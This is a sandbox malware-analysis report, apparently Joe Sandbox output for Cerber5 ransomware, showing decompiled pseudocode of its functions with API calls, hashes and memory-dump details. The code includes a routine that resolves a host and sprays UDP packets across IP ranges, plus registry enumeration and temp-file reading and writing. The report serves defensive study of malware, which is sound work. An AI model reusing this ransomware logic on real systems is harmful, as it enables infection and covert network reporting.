				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				short _v54;
				char _v56;
				char* _v60;
				char _v64;
				intOrPtr _v68;
				signed char _v84;
				char _v188;
				char _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t83;
				void* _t87;
				void* _t90;
				signed int _t93;
				char* _t98;
				CHAR* _t99;
				long _t106;
				void* _t108;
				signed short _t111;
				short _t114;
				intOrPtr _t115;
				void* _t117;
				intOrPtr _t120;
				char _t135;
				char _t136;
				char _t141;
				void* _t146;
				intOrPtr _t147;
				intOrPtr _t148;
				void* _t150;
				signed int _t152;
				void* _t159;
				void* _t168;
				signed int _t172;
				char _t175;
				void* _t176;
				CHAR* _t178;
				short _t181;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t191;
				void* _t192;
				signed int _t199;

				_t168 = __edx;
				_v9 = 0;
				_t83 = E00405905(0x40d534, 7, 0xfd311b35);
				_t185 = _t184 + 0xc;
				_t176 = E004031AF(_a4, __eflags, _t83);
				_t196 = _t176;
				if(_t176 != 0) {
					_t87 = E00405905( &E0040D53C, 0xa, 0xfcf57ebc);
					_t186 = _t185 + 0xc;
					_t150 = E004031AF(_t176, _t196, _t87);
					_t197 = _t150;
					if(_t150 != 0) {
						_t90 = E00405905(0x40d548, 7, 0x9c7f3440);
						_t187 = _t186 + 0xc;
						_t93 = E00403253(E004031AF(_t150, _t197, _t90), _t197);
						_v20 = _v20 & 0x00000000;
						_v40 = _t93;
						if(_t93 == 0) {
							_t6 =  &_v40;
							 *_t6 = _v40 | 0xffffffff;
							_t199 =  *_t6;
						}
						_t169 = E004031AF(_t150, _t199, _a8);
						_t98 = E00401127(0, E004032B8(_t95, _t199));
						_v60 = _t98;
						if(_t98 != 0) {
							_t99 = E004078F0(_t98,  &_v20, _t168,  &_v20); // executed
							_t178 = _t99;
							_pop(_t159);
							_v24 = _t178;
							_t201 = _t178;
							if(_t178 != 0) {
								CharLowerBuffA(_t178, _v20);
								E0040AD86(_t159, _t178, _v20,  &_v84);
								_t106 = E00405BAA(_t150,  &_v24, _t169, _t178, _t201);
								_v20 = _t106;
								CharLowerBuffA(_v24, _t106);
								_t108 = E00405905(0x40d558, 4, 0x60ae4eaf);
								_t191 = _t187 + 0x30;
								_t111 = E00403253(E004031AF(_t150, _t201, _t108), _t201);
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t181 = 2;
								asm("stosw");
								_v56 = _t181;
								_t114 =  *0x40e020(_t111 & 0x0000ffff, _v20, E00405905(0x40d550, 4, 0x8ba91a9e), _v84 & 0x000000ff);
								_v54 = _t114;
								_t115 =  *0x40e000(_t181, _t181, 0x11); // executed
								_v36 = _t115;
								_t202 = _t115 - 0xffffffff;
								if(_t115 != 0xffffffff) {
									_t117 = E00405905(0x40d560, _t181, 0x7d18c472);
									_t192 = _t191 + 0xc;
									_t183 = E004031AF(_t150, _t202, _t117);
									_t120 = E00403156(_t119, _t202);
									_v28 = _v28 & 0x00000000;
									_v68 = _t120;
									_t203 = _t120;
									if(_t120 != 0) {
										do {
											_push( &_v64);
											_push( &_v292);
											_push( &_v188);
											_push(E00405905(0x40d564, 0xb, 0xb32d2f4a));
											sscanf(E004032B8(E0040317B(_t183, _t203, _v28), _t203));
											_t192 = _t192 + 0x20;
											_t172 = E0040557F(_v64);
											_t152 = E00405532( &_v188) & _t172;
											_v16 =  !_t172 | _t152;
											_t175 = 0;
											_v32 = _t152;
											_v5 = _t152;
											if(_t152 <= _v16) {
												do {
													_v6 = _t152;
													if(_t152 <= _v15) {
														do {
															_t135 = _v30;
															while(1) {
																_v8 = _t135;
																if(_t135 > _v14) {
																	break;
																}
																_t136 = _v29;
																while(1) {
																	_v7 = _t136;
																	__eflags = _t136 - _v13;
																	if(_t136 > _v13) {
																		break;
																	}
																	_v52 = _v5;
																	_v51 = _v6;
																	_v50 = _v8;
																	_v49 = _v7;
																	_t141 = _t175;
																	_t175 = _t175 + 1;
																	__eflags = _t141 - _v40;
																	if(_t141 == _v40) {
																		_t175 = 0; // executed
																		__eflags = 0;
																		Sleep(0x3e8); // executed
																	}
																	E00402B21(_t152, _t168, _t175, _t183);
																	_t192 = _t192 + 0x1c;
																	_t146 =  *0x40e01c(_v36, _v24, _v20, 0,  &_v56, 0x10, _a4, E00405905(0x40d570, 0x13, 0xb66841e3), E0040555D(_v52), _v24); // executed
																	__eflags = _t146 - _v20;
																	if(_t146 == _v20) {
																		_v9 = 1;
																	}
																	_t147 = _v7;
																	__eflags = _t147 - 0xff;
																	if(_t147 != 0xff) {
																		_t136 = _t147 + 1;
																		__eflags = _t136;
																		continue;
																	}
																	break;
																}
																_t148 = _v8;
																__eflags = _t148 - 0xff;
																if(__eflags != 0) {
																	_t135 = _t148 + 1;
																	__eflags = _t135;
																	continue;
																}
																break;
															}
															if(_v6 != 0xff) {
																goto L23;
															}
															goto L24;
															L23:
															_v6 = _v6 + 1;
														} while (_v6 <= _v15);
													}
													L24:
													if(_v5 != 0xff) {
														goto L25;
													}
													goto L26;
													L25:
													_v5 = _v5 + 1;
												} while (_v5 <= _v16);
											}
											L26:
											_v28 = _v28 + 1;
										} while (_v28 < _v68);
									}
									E00405568(_v36);
								}
								E00405463(_v24);
							}
							E00405463(_v60);
						}
					}
				}
				return _v9;
			}

0x00407341
0x00407359
0x0040735d
0x00407362
0x0040736e
0x00407371
0x00407373
0x00407385
0x0040738a
0x00407395
0x00407398
0x0040739a
0x004073ac
0x004073b1
0x004073bf
0x004073c4
0x004073c8
0x004073cd
0x004073cf
0x004073cf
0x004073cf
0x004073cf
0x004073de
0x004073e8
0x004073ee
0x004073f3
0x004073fd
0x00407402
0x00407404
0x00407405
0x00407408
0x0040740a
0x00407414
0x00407422
0x0040744a
0x00407456
0x00407459
0x0040746b
0x00407470
0x0040747e
0x0040748b
0x0040748c
0x0040748d
0x00407490
0x00407491
0x00407496
0x0040749a
0x004074a4
0x004074a8
0x004074ae
0x004074b1
0x004074b4
0x004074c5
0x004074ca
0x004074d6
0x004074d8
0x004074dd
0x004074e1
0x004074e4
0x004074e6
0x004074ec
0x004074ef
0x004074f6
0x004074fd
0x00407512
0x00407524
0x0040752d
0x00407535
0x00407545
0x0040754b
0x0040754e
0x00407551
0x00407554
0x0040755a
0x00407560
0x00407560
0x00407566
0x0040756c
0x0040756c
0x00407614
0x00407614
0x0040761a
0x00000000
0x00000000
0x00407574
0x004075ff
0x004075ff
0x00407602
0x00407605
0x00000000
0x00000000
0x0040757f
0x00407585
0x0040758b
0x00407591
0x00407594
0x00407596
0x00407597
0x0040759a
0x004075a1
0x004075a1
0x004075a3
0x004075a3
0x004075ce
0x004075d3
0x004075e7
0x004075ed
0x004075f0
0x004075f2
0x004075f2
0x004075f6
0x004075f9
0x004075fb
0x004075fd
0x004075fd
0x00000000
0x004075fd
0x00000000
0x004075fb
0x0040760b
0x0040760e
0x00407610
0x00407612
0x00407612
0x00000000
0x00407612
0x00000000
0x00407610
0x00407624
0x00000000
0x00000000
0x00000000
0x00407626
0x00407626
0x0040762c
0x0040756c
0x00407635
0x00407639
0x00000000
0x00000000
0x00000000
0x0040763b
0x0040763b
0x00407641
0x00407560
0x0040764a
0x0040764a
0x00407650
0x004074ec
0x0040765c
0x00407661
0x00407665
0x00407665
0x0040766d
0x0040766d
0x004073f3
0x0040739a
0x00407679

APIs

Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6

CharLowerBuffA.USER32(00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00407414
CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?), ref: 00407459
htons.WS2_32 ref: 0040749A
socket.WS2_32(00000002,00000002,00000011), ref: 004074A8
sscanf.MSVCRT ref: 00407524

Part of subcall function 0040557F: htonl.WS2_32(?), ref: 0040558D

Part of subcall function 00405532: inet_addr.WS2_32(Cu@), ref: 00405537
Part of subcall function 00405532: gethostbyname.WS2_32(?), ref: 00405548

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: BuffCharLower$gethostbynamehtonlhtonsinet_addrlstrcmpisocketsscanf
String ID:
API String ID: 2857926056-0
Opcode ID: 03d8161cffbd0b3667f532098a1c66c307f98ab70770e3fbebd962e44b3806ab
Instruction ID: 78b374b52b19eb6b1b31afc7c374d959c6df6e4001e96d7b0c5d057715c2210f
Opcode Fuzzy Hash: 03d8161cffbd0b3667f532098a1c66c307f98ab70770e3fbebd962e44b3806ab
Instruction Fuzzy Hash: E291F971D04248BEDF01ABF99C02AEF7F75AF05314F1404BAF454B62C2D6395A068B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00409C8E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00409C8E(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v0;
				short _v56;
				short _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				void* _t57;
				void* _t60;
				void* _t66;
				intOrPtr _t75;
				intOrPtr _t77;
				void* _t78;
				void* _t80;
				void* _t81;
				void* _t83;
				void* _t84;
				void* _t86;
				signed int _t90;
				long _t93;
				intOrPtr _t97;
				signed int _t102;
				intOrPtr _t103;
				signed int* _t105;
				signed int* _t109;
				intOrPtr _t111;
				void* _t114;
				void* _t118;
				intOrPtr _t120;
				intOrPtr _t122;
				void* _t123;
				intOrPtr _t125;
				signed int _t132;
				signed int _t134;
				intOrPtr _t137;
				void* _t143;
				void* _t146;
				void* _t148;
				void* _t149;
				void* _t150;
				void* _t151;
				signed int* _t154;
				signed int* _t155;
				signed int* _t157;
				signed int* _t160;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				void* _t168;
				void* _t170;
				signed int _t171;
				void* _t172;
				signed int _t174;
				void* _t177;
				void* _t178;
				void* _t179;
				signed int _t181;
				void* _t186;
				signed int* _t189;
				signed int* _t190;
				signed int* _t191;
				signed int* _t192;
				signed int* _t195;
				signed int* _t196;
				void* _t199;
				signed int _t206;
				void* _t211;
				void* _t213;
				signed int _t224;

				_t199 = __eflags;
				_t172 = __edx;
				 *0x40f1d8(0x42fad4);
				E0040692E(__ecx, E00409B30, 0); // executed
				_t53 = E00405905( &E0040D17C, 7, 0x80c426c8);
				_t189 =  &(( &_v80)[5]);
				_t177 = E004031AF(_v0, _t199, _t53);
				_t200 = _t177;
				if(_t177 == 0) {
					L10:
					E00409215(_t172, _t208, _v0);
					_t57 = E00405905( &E0040D668, 9, 0x9c36dbf2);
					_t190 =  &(_t189[3]);
					_t186 = E004031AF(_v0, _t208, _t57);
					_t209 = _t186;
					if(_t186 == 0) {
						L30:
						_t60 = E00405905(0x40d834, 9, 0xd1c1cf3d);
						_t191 =  &(_t190[3]);
						_t178 = E004031AF(_v0, _t219, _t60);
						_t220 = _t178;
						if(_t178 == 0) {
							L35:
							 *0x40f93c(0x16, 0, 0x42fa80,  &E0040FC68);
							_t224 =  *0x42fa7c; // 0x63d4610
							return 0 | _t224 != 0x00000000;
						}
						_t66 = E00405905( &E0040D814, 7, 0x79d16581);
						_t192 =  &(_t191[3]);
						_t179 = E004031AF(_t178, _t220, _t66);
						_pop(_t143);
						_t221 = _t179;
						if(_t179 == 0) {
							goto L35;
						}
						E004099D8(_t143, _t175, E0040591C(0x40d840, 0xf, 0x514e394d));
						_t192[3] = 0x3735a35c;
						E004099D8(_t143, _t175, E0040591C());
						E00409AFD(_t221, 0x1a); // executed
						E00409AFD(_t221, 0x1c); // executed
						_t146 = 0x40d850;
						_t75 = E00409518(_t146, _t179, 3);
						_t148 = 0xe;
						 *0x42fa74 = _t75;
						if(_t75 != 0) {
							L34:
							E00409C5C(_t223); // executed
							goto L35;
						}
						_push(0xc);
						_t77 = E004053B4(_t148);
						 *0x42fa74 = _t77;
						_t223 = _t77;
						if(_t77 == 0) {
							goto L35;
						}
						goto L34;
					}
					_t78 = E00405905(0x40d7b8, 5, 0xbfa95e66);
					_t195 =  &(_t190[3]);
					_t80 = E004031AF(_t186, _t209, _t78);
					_t135 = _t80;
					_pop(_t149);
					if(_t80 == 0) {
						L17:
						_t81 = E00405905( &E0040D814, 7, 0x79d16581);
						_t196 =  &(_t195[3]);
						_t83 = E004031AF(_t186, _t213, _t81);
						_pop(_t150);
						if(_t83 == 0) {
							L25:
							_t84 = E00405905(0x40d824, 0xa, 0xd9c16e9a);
							_t190 =  &(_t196[3]);
							_t86 = E004031AF(_t186, _t216, _t84);
							_pop(_t151);
							if(_t86 != 0) {
								_t154 = E00409518(_t151, _t86, 1);
								 *0x42fa60 = _t154;
								if(_t154 != 0) {
									_t175 = _t154[2];
									_t90 = E004053CA(4 +  *_t154 * 4, _t154, _t154[2]);
									_t155 =  *0x42fa60; // 0x63d0f28
									_t155[2] = _t90;
									_t219 = _t90;
									if(_t90 == 0) {
										 *_t155 =  *_t155 & 0x00000000;
										__eflags =  *_t155;
									} else {
										_push("955c");
										_t93 = wsprintfW( &_v64, E0040591C(0x40d830, 3, 0x26e76e6e));
										_t190 =  &(_t190[6]);
										CharLowerBuffW( &_v56, _t93);
										_t97 = E00408E00(_t155,  &_v56);
										_t157 =  *0x42fa60; // 0x63d0f28
										_t45 =  &(_t157[2]); // 0x63cd4f0
										 *((intOrPtr*)( *_t45 +  *_t157 * 4)) = _t97;
										 *_t157 =  *_t157 + 1;
									}
								}
							}
							goto L30;
						}
						_t160 = E00409518(_t150, _t83, 2);
						 *0x42faec = _t160;
						if(_t160 == 0) {
							goto L25;
						}
						_t175 = _t160[2];
						_t102 = E004053CA( *_t160 +  *0x42fad0 << 2, _t160, _t160[2]);
						_t161 =  *0x42faec; // 0x63d11a8
						_t181 = 0;
						_t161[2] = _t102;
						_t216 = _t102;
						if(_t102 != 0) {
							__eflags =  *0x42fad0 - _t181; // 0x4
							if(__eflags <= 0) {
								goto L25;
							} else {
								goto L22;
							}
							do {
								L22:
								_t103 =  *0x42facc; // 0x63c0ad0
								_push( *((intOrPtr*)(_t103 + _t181 * 4)));
								_push(E0040591C( &E0040D81C, 4, 0x65dbde8b));
								_t105 =  *0x42faec; // 0x63d11a8
								_t32 =  &(_t105[2]); // 0x63c9d00
								_push( *_t32 +  *_t105 * 4); // executed
								E00405B0C(_t135,  *_t105, _t175, _t181, __eflags);
								_t109 =  *0x42faec; // 0x63d11a8
								_t163 =  *_t109;
								_t35 =  &(_t109[2]); // 0x63c9d00
								_t174 =  *_t35;
								_t196 =  &(_t196[6]);
								__eflags =  *(_t174 + _t163 * 4);
								if( *(_t174 + _t163 * 4) != 0) {
									_t164 = _t163 + 1;
									__eflags = _t164;
									 *_t109 = _t164;
								}
								_t181 = _t181 + 1;
								__eflags = _t181 -  *0x42fad0; // 0x4
							} while (__eflags < 0);
							goto L25;
						}
						 *_t161 = 0;
						goto L25;
					}
					_t175 = 0;
					_t211 =  *0x42fac4 - _t175; // 0x2
					if(_t211 <= 0) {
						L16:
						 *0x42fa5c = E00409518(_t149, _t135, 0);
						goto L17;
					} else {
						goto L13;
					}
					do {
						L13:
						_t111 =  *0x42fa70; // 0x63d2a50
						_t114 = E0040562B(0,  *((intOrPtr*)( *((intOrPtr*)(_t111 + _t175 * 4)))));
						_t182 = _t114;
						_pop(_t149);
						if(_t114 != 0) {
							E00402FF6(_t149, _t182);
							_pop(_t149);
							E00403144(_t149);
							E00405463(_t182);
						}
						_t175 = _t175 + 1;
						_t213 = _t175 -  *0x42fac4; // 0x2
					} while (_t213 < 0);
					goto L16;
				}
				_t118 = E00405905(0x40d7b8, 5, 0xbfa95e66);
				_t189 =  &(_t189[3]);
				_t120 = E004031AF(_t177, _t200, _t118);
				_pop(_t167);
				_v76 = _t120;
				_t201 = _t120;
				if(_t120 == 0) {
					L9:
					E00409857(_t167, _t208); // executed
					goto L10;
				}
				_t122 = E00403156(_t120, _t201);
				_v80 = _v80 & 0x00000000;
				_v68 = _t122;
				_t202 = _t122;
				if(_t122 == 0) {
					goto L9;
				} else {
					goto L3;
				}
				do {
					L3:
					_t123 = E0040317B(_v76, _t202, _v80);
					_t185 = _t123;
					_pop(_t167);
					_t203 = _t123;
					if(_t123 == 0) {
						goto L8;
					}
					_t125 = E00403156(_t185, _t203);
					_v84 = _v84 & 0x00000000;
					_v72 = _t125;
					_t204 = _t125;
					if(_t125 == 0) {
						goto L8;
					} else {
						goto L5;
					}
					do {
						L5:
						_t187 = E00402FED(_t167);
						E0040317B(_t185, _t204, _v84);
						_pop(_t168);
						E0040314D(_t168);
						_t137 = E00409518(_t168, _t126, 1);
						_pop(_t170);
						if(_t137 != 0) {
							_t132 =  *0x42fa78; // 0x1ed
							_t175 =  *0x42fa7c; // 0x63d4610
							_t134 = E004053CA(4 + _t132 * 4, _t170, _t175);
							_t171 =  *0x42fa78; // 0x1ed
							 *0x42fa78 =  *0x42fa78 + 1;
							_t206 =  *0x42fa78;
							 *0x42fa7c = _t134;
							 *((intOrPtr*)(_t134 + _t171 * 4)) = _t137;
						}
						E00403085(_t206, _t187);
						_v84 = _v84 + 1;
						_pop(_t167);
					} while (_v84 < _v72);
					L8:
					_v80 = _v80 + 1;
					_t208 = _v80 - _v68;
				} while (_v80 < _v68);
				goto L9;
			}

0x00409c8e
0x00409c8e
0x00409c9a
0x00409ca7
0x00409cb8
0x00409cbd
0x00409cca
0x00409ccd
0x00409ccf
0x00409dbb
0x00409dbf
0x00409dd1
0x00409dd6
0x00409de3
0x00409de6
0x00409de8
0x00409fc1
0x00409fcd
0x00409fd2
0x00409fdf
0x00409fe2
0x00409fe4
0x0040a07d
0x0040a08b
0x0040a094
0x0040a0a3
0x0040a0a3
0x00409ff6
0x00409ffb
0x0040a006
0x0040a008
0x0040a009
0x0040a00b
0x00000000
0x00000000
0x0040a022
0x0040a027
0x0040a03e
0x0040a046
0x0040a04e
0x0040a053
0x0040a057
0x0040a05d
0x0040a05e
0x0040a065
0x0040a078
0x0040a078
0x00000000
0x0040a078
0x0040a067
0x0040a06a
0x0040a06f
0x0040a074
0x0040a076
0x00000000
0x00000000
0x00000000
0x0040a076
0x00409dfa
0x00409dff
0x00409e05
0x00409e0a
0x00409e0c
0x00409e0f
0x00409e5c
0x00409e68
0x00409e6d
0x00409e73
0x00409e78
0x00409e7b
0x00409f14
0x00409f20
0x00409f25
0x00409f2b
0x00409f30
0x00409f33
0x00409f43
0x00409f45
0x00409f4d
0x00409f51
0x00409f5b
0x00409f60
0x00409f66
0x00409f69
0x00409f6b
0x00409fbe
0x00409fbe
0x00409f6d
0x00409f6d
0x00409f8c
0x00409f92
0x00409f9b
0x00409fa6
0x00409fac
0x00409fb4
0x00409fb7
0x00409fba
0x00409fba
0x00409f6b
0x00409f4d
0x00000000
0x00409f33
0x00409e8b
0x00409e8d
0x00409e95
0x00000000
0x00000000
0x00409e9f
0x00409ea5
0x00409eaa
0x00409eb0
0x00409eb2
0x00409eb5
0x00409eb7
0x00409ebd
0x00409ec3
0x00000000
0x00000000
0x00000000
0x00000000
0x00409ec5
0x00409ec5
0x00409ec5
0x00409eca
0x00409ee1
0x00409ee2
0x00409ee9
0x00409eef
0x00409ef0
0x00409ef5
0x00409efa
0x00409efc
0x00409efc
0x00409eff
0x00409f02
0x00409f06
0x00409f08
0x00409f08
0x00409f09
0x00409f09
0x00409f0b
0x00409f0c
0x00409f0c
0x00000000
0x00409ec5
0x00409eb9
0x00000000
0x00409eb9
0x00409e11
0x00409e13
0x00409e19
0x00409e4d
0x00409e57
0x00000000
0x00000000
0x00000000
0x00000000
0x00409e1b
0x00409e1b
0x00409e1b
0x00409e27
0x00409e2c
0x00409e2e
0x00409e31
0x00409e34
0x00409e39
0x00409e3a
0x00409e3f
0x00409e3f
0x00409e44
0x00409e45
0x00409e45
0x00000000
0x00409e1b
0x00409ce1
0x00409ce6
0x00409cec
0x00409cf1
0x00409cf2
0x00409cf6
0x00409cf8
0x00409db6
0x00409db6
0x00000000
0x00409db6
0x00409d00
0x00409d05
0x00409d0a
0x00409d0e
0x00409d10
0x00000000
0x00000000
0x00000000
0x00000000
0x00409d16
0x00409d16
0x00409d1e
0x00409d23
0x00409d25
0x00409d26
0x00409d28
0x00000000
0x00000000
0x00409d2a
0x00409d2f
0x00409d34
0x00409d38
0x00409d3a
0x00000000
0x00000000
0x00000000
0x00000000
0x00409d3c
0x00409d3c
0x00409d45
0x00409d47
0x00409d4c
0x00409d4f
0x00409d5c
0x00409d5f
0x00409d62
0x00409d64
0x00409d69
0x00409d76
0x00409d7b
0x00409d81
0x00409d81
0x00409d87
0x00409d8c
0x00409d8c
0x00409d90
0x00409d95
0x00409d9d
0x00409d9e
0x00409da4
0x00409da4
0x00409dac
0x00409dac
0x00000000

APIs

RtlInitializeCriticalSection.NTDLL(0042FAD4), ref: 00409C9A

Part of subcall function 0040692E: RegOpenKeyExW.KERNEL32(80000002,00000000,00020119,00000000,00000000,00409B30,00000000,?,00000000), ref: 0040695B
Part of subcall function 0040692E: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0040697A
Part of subcall function 0040692E: RegEnumKeyW.ADVAPI32(00000000,00000000,00000000,00000000), ref: 004069A9
Part of subcall function 0040692E: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004069EC

Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6

wsprintfW.USER32 ref: 00409F8C
CharLowerBuffW.USER32(?,00000000), ref: 00409F9B
CreateWellKnownSid.ADVAPI32(00000016,00000000,0042FA80,0040FC68,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040A08B

Part of subcall function 00409518: CharLowerBuffW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004095C7

Part of subcall function 004053CA: GetLastError.KERNEL32(00000000,00000000,00402F19,?,00405A60,?,00000000,00402E81,00402F19), ref: 004053D2
Part of subcall function 004053CA: SetLastError.KERNEL32(00000000,?,00405A60,?,00000000,00402E81,00402F19), ref: 00405457

Strings

955c, xrefs: 00409F6D

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: BuffCharErrorLastLower$CloseCreateCriticalEnumInfoInitializeKnownOpenQuerySectionWelllstrcmpiwsprintf
String ID: 955c
API String ID: 2837586674-4165844248
Opcode ID: 74e4fe0b5d240772b4d3d9403435ba4b1cb7b1d43f077e24a63fdc264ba793d4
Instruction ID: f53d3d57d72d2fba058dee37206852e67e00b2b4db81be835a0203e8b915a40b
Opcode Fuzzy Hash: 74e4fe0b5d240772b4d3d9403435ba4b1cb7b1d43f077e24a63fdc264ba793d4
Instruction Fuzzy Hash: 7EA1B272A447069FD620BF65EC42F1B37A8AB44714F51043FF808BB2D3DA799D058A9D

Uniqueness

Uniqueness Score: -1.00%

Function 004025E6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004025E6(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, long* _a8) {
				void* _v8;
				WCHAR* _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t17;
				long* _t20;
				void* _t28;
				long _t33;

				_t27 = __ecx;
				_push(_a4);
				_push("C:\Users\engineer\AppData\Local\Temp\d06ed635");
				_t28 = 0;
				_push(E0040591C( &E0040D170, 9, 0x3298a9eb));
				_push( &_v12);
				if(E00405B0C(0, __ecx, 0, __esi, __eflags) != 0) {
					_push(__esi);
					_t17 = CreateFileW(_v12, 0x80000000, 1, 0, 3, 0, 0); // executed
					_v8 = _t17;
					if(_t17 != 0xffffffff) {
						_t33 = GetFileSize(_t17, 0);
						_t20 = _a8;
						if(_t20 != 0) {
							 *_t20 = _t33;
						}
						_t28 = E004053BD(_t27);
						if(_t28 != 0) {
							if(ReadFile(_v8, _t28, _t33,  &_v16, 0) == 0 || _t33 != _v16) {
								E00405463(_t28);
								_t28 = 0;
								__eflags = 0;
							} else {
								 *((char*)(_t28 + _t33)) = 0;
							}
						}
						CloseHandle(_v8);
					}
					E00405463(_v12);
				}
				return _t28;
			}

0x004025e6
0x004025ee
0x004025f3
0x00402604
0x0040260e
0x00402612
0x0040261d
0x0040261f
0x0040262f
0x00402635
0x0040263b
0x00402645
0x00402647
0x0040264c
0x0040264e
0x0040264e
0x00402658
0x0040265c
0x00402670
0x0040267e
0x00402683
0x00402683
0x00402677
0x00402677
0x00402677
0x00402670
0x00402688
0x00402688
0x00402691
0x00402696
0x0040269c

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,0040D17C,?,?,?,?,?,?,?,00000000), ref: 0040262F
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 0040263F
ReadFile.KERNEL32(004029D6,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,004029D6,00000000), ref: 00402668
CloseHandle.KERNEL32(004029D6,?,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 00402688

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

Strings

C:\Users\user\AppData\Local\Temp\d06ed635, xrefs: 004025F3

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$ErrorLast$CloseCreateFreeHandleHeapReadSize
String ID: C:\Users\user\AppData\Local\Temp\d06ed635
API String ID: 1761772567-561343493
Opcode ID: e5f67ced36fef974d76bb1cef8f14bd84dfa63e88f18fd2ba140fa135439d158
Instruction ID: bd1e91014a81025413ce5f3561b387066ac48bd53aee3230f565365039a3e6e7
Opcode Fuzzy Hash: e5f67ced36fef974d76bb1cef8f14bd84dfa63e88f18fd2ba140fa135439d158
Instruction Fuzzy Hash: F31159B2900108BFDB206B65DD89EAF3B7CDB84354F110976F810F31D0EB769E048A98

Uniqueness

Uniqueness Score: -1.00%

Function 00402522 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00402522(void* __ecx, long __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				WCHAR* _v8;
				long _v12;
				void* __ebx;
				void* __ebp;
				void* _t13;
				int _t16;
				long _t20;
				void* _t25;
				void* _t31;

				_t31 = __eflags;
				_push(__ecx);
				_push(__ecx);
				E00404CDC();
				_push(_a4);
				_t20 = 0;
				_push("C:\Users\engineer\AppData\Local\Temp\d06ed635");
				_push(E0040591C( &E0040D170, 9, 0x3298a9eb));
				_push( &_v8);
				if(E00405B0C(0, __ecx, __edi, __esi, _t31) != 0) {
					_push(__esi);
					_t13 = CreateFileW(_v8, 0x40000000, 1, 0, 2, 0, 0); // executed
					_t25 = _t13;
					if(_t25 != 0xffffffff) {
						_t16 = WriteFile(_t25, _a8, __edi,  &_v12, 0); // executed
						if(_t16 != 0 && __edi == _v12) {
							_t20 = 1;
						}
						FlushFileBuffers(_t25);
						CloseHandle(_t25);
					}
					E00405463(_v8);
				}
				return _t20;
			}

0x00402522
0x00402525
0x00402526
0x00402528
0x0040252d
0x00402530
0x00402532
0x0040254b
0x0040254f
0x0040255a
0x0040255c
0x0040256c
0x00402572
0x00402577
0x00402583
0x0040258b
0x00402592
0x00402592
0x00402595
0x0040259c
0x0040259c
0x004025a5
0x004025aa
0x004025af

APIs

Part of subcall function 00404CDC: PathSkipRootW.SHLWAPI(C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000), ref: 00404CE8
Part of subcall function 00404CDC: GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000,00000001,00000000), ref: 00404D10
Part of subcall function 00404CDC: CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000,00000001), ref: 00404D1E

